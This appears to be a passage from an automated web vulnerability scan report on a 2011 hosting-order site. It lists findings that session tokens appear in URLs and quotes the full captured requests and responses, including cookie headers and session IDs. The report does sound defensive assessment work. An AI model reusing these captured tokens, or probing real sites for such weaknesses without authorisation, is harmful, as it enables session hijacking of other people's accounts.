<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">New Features for Windows&reg; packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Webspace Explorer
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Click-n-Build Applications
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 SiteAnalytics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">1&amp;1 Downloadable Green Logo </a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Blog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.74. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.75. http://order.1and1.com/xml/order/International

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:38:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/International?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.76. http://order.1and1.com/xml/order/Jumpto

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:22:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue
Content-Length: 0
Connection: close
Content-Type: text/plain


3.77. http://order.1and1.com/xml/order/LocalSubmission

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal
Content-Length: 0
Connection: close
Content-Type: text/plain


3.78. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
